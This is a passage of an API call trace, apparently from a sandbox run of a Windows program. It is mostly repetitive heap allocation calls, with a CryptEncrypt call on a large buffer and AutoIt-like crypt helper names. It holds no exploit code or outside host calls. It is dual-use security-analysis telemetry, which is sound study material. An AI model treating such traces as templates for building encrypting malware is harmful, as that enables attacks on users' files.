Size=0x10) returned 0x2e51148 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.457] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.462] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0230.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51340 [0230.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51340, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0230.465] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f3caf0*, pdwDataLen=0x8cef60*=0xd640, dwBufLen=0xd648 | out: pbData=0x2f3caf0*, pdwDataLen=0x8cef60*=0xd648) returned 1 [0230.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0230.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0230.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0230.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0230.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0230.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0230.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0230.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0230.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0230.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2e80330 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0230.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd648) returned 0x2e8d980 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0230.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.509] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.509] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0230.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0230.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0230.510] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.510] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0230.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0230.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0230.510] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0230.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0230.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0230.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.510] 